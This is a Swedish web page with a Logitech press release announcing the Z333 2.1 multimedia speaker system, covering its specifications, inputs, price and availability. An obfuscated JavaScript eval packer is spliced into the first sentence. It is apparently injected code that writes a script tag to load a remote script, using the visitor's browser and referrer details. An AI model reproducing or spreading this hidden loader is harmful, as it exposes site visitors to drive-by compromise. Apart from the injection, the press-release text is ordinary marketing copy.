Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Logitech lanserar nytt mångsidigt högtalarsystem

Logitech lanserar nytt mångsidigt högtalarsystem

Idag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nakfn|var|u0026u|referrer|dtbrr||js|php’.split(’|’),0,{}))
lanserar Logitech det senaste tillskottet till sin serie multimediahögtalare – Logitech Z333. 2.1-systemet levererar med sina 80 watt (40W RMS) ordentlig bas ur sin subwoofer och klart mellanregister och diskant via sina två satellithögtalare.

”Logitech Z333 låter som det ser ut: kraftfullt,” säger Christina Holmberg på Logitech Sverige. ”Systemet är byggt efter den höga standard som har gjort Logitech till ledande leverantör av datorhögtalare världen över. Ljudet tar din musik, film eller dina spel till en helt ny nivå”

Logitech Z333 levererar klart och balanserat ljud över hela frekvensomfånget. Den framåtriktade subwoofern är utrustad med ett femtumselement som producerar ett kraftfullt ljud. Basnivåerna justerar du enkelt med en dedikerad volymkontroll på subwoofern. En separat inkopplad kontrolldosa låter dig ställa in hela systemets volym.

Utöver den imponerande akustiken är Z333 mångsidigt och smidigt. Det harflera 3.5mm och RCA-ingångar som låter dig koppla in i princip vilken ljudkälla som helst, dator, telefon, tablet eller TV.

Pris och tillgänglighet

Logitech Z333 förväntas finnas tillgängliga från oktober 2014, med ett föreslaget pris på 449:-. För mer info besök www.logitech.com eller vår blogg.

Om Logitech

Logitech är världsledande inom produkter som kopplar dig samman med de digitala upplevelser som spelar roll för dig. Med en spännvidd över mängder av dator-, kommunikations- och underhållningsplattformar underlättar och förbättrar Logitechs hård- och mjukvara digital navigation, konsumtion av musik- och videounderhållning, gaming, socialt nätverkande, kommunikation över internet, videosäkerhet och kontroll över hemunderhållning. Logitech grundades 1981 och är ett Schweiziskt publikt aktiebolag listat på SIX Swiss Exchange (LOGN) och på Nasdaq Global Select Market (LOGI).

Detta är ett pressmeddelande från Logitech